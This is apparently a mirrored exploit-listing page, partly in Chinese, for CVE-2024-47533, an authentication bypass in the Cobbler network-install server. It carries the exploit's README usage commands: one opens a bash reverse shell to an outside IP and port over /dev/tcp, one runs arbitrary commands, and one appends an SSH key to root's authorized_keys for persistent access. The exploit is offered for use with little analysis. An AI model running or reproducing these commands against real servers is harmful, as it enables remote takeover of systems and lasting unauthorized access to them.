CVE-2024-47533 PoC — Cobbler 授权问题漏洞

Source

https://github.com/baph00met/CVE-2024-47533

Associated Vulnerability

Title:Cobbler 授权问题漏洞 (CVE-2024-47533)
Description:Cobbler是Cobbler开源的一款网络安装服务器套件，它主要用于快速建立Linux网络安装环境。 Cobbler 3.0.0到3.2.3和3.3.7之前版本存在授权问题漏洞，该漏洞源于身份验证不当，导致任何能够通过网络访问服务器的人都可以完全控制该服务器。

Description

 CVE-2024-47533: Cobbler Authentication Bypass & Code Execution

Readme

```bash
# Reverse shell
python3 CVE-2024-47533.py --url http://127.0.0.1:25151 --cmd 'bash -c "bash -i >& /dev/tcp/10.10.14.23/4444 0>&1"'

# Simple command
python3 CVE-2024-47533.py --url http://127.0.0.1:25151 --cmd 'id'

# Drop SSH key
python3 CVE-2024-47533.py --url http://127.0.0.1:25151 --cmd 'mkdir -p /root/.ssh && echo ssh-ed25519 AAAA... >> /root/.ssh/authorized_keys'
```

File Snapshot


 [4.0K]  /data/pocs/2845e1e485a719b728cb502343dcb97c67d0b2c6
├── [2.6K]  CVE-2024-47533.py
└── [ 384]  README.md

0 directories, 2 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!